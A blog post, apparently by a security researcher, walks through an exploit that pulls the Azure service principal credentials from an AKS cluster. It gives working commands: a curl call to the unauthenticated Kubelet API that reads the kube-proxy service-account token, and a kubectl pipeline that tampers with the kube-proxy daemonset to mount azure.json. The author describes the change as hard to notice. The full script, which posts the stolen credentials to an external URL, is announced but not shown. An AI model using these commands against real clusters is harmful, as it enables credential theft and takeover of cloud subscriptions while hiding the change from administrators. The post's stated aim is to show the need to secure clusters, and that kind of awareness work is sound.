DISCLAIMER: the contents below are for general information purposes only. The exploit is only to emphasise the need to secure your AKS clusters and not to use untrusted docker images. Use of information contained here is therefore strictly at your own risk.

I will walk-through an exploit I created that allows a simple container to find the Azure service principal details from an AKS cluster and send that to a remote URL.

Most of the things used here are based on the taking over AKS clusters post I wrote a while ago. And a fundamental piece to achieve this is the Kubelet API trick, which allows you to poke around any running pod within a node, giving you get extra powers even if your pod runs as a non-root/least-privileged user.

To understand a bit better how we will get access to the Azure Subscription, you need to know that AKS is based on the ACS engine, which is an open-source project that eases the provisioning of clusters on Azure. It internally uses a file to store the Service Principal Name (SPN) so it can interact with the Azure API. That file exists in every single cluster node and is located in the path below:

/etc/kubernetes/azure.json

There are a few different ways to get the contents of this file, but in essence, we will need to mount the host (node) volume onto a privileged container.

The sneakiest way I found to do this, is to manipulate the kube-proxy daemonset which already runs as privileged and has a mount to /etc/kubernetes/certs. As people tend to not pay much attention to what goes on within the kube-system namespace, the change we will make can easily be overlooked.

Getting an API Server Token

Depending on how your image is scheduled, you may or may not get an API Server token mounted in your pod. To make this more generic, we will get the token from a kube-proxy container:

curl --connect-timeout 5 -sk https://10.240.0.4:10250/run/kube-system/$(curl -sk https://10.240.0.4:10250/runningpods/ | jq '.items[].metadata.name' | grep kube-proxy | sed 's/"//g')/kube-proxy/ -d "cmd=cat /run/secrets/kubernetes.io/serviceaccount/token" -o token.txt

Notice that we are leveraging the unauthenticated access to Kubelet API on IP 10.240.0.4. That is generally the first node within an AKS cluster. However, a cleverer exploit could find this dynamically.

Tampering with kube-proxy

The kube-proxy requires access to the path /etc/kubernetes/certs. We will amend that, so we actually mount its parent folder. That simple change will keep the system working, as the certs mapping will still be available, however, it will also provide us access to the azure.json file. This are the full contents we will get access to:

In theory, that could be done by exporting its yaml file, replacing kubernetes/certs with /kubernetes, then applying the change:

kubectl get ds/kube-proxy --namespace kube-system -o yaml --export | sed -E 's/kubernetes\/certs/kubernetes/g' | kubectl apply --namespace kube-system -f -

By default, the changes on daemonsets are only rolled-out on delete. So in the actual exploit we do it in three steps: 1. export, 2. remove existing kube-proxy, 3. apply changes.

Here’s the full exploit.sh:

When executed it will print the Azure SPN and also post it to an external URL.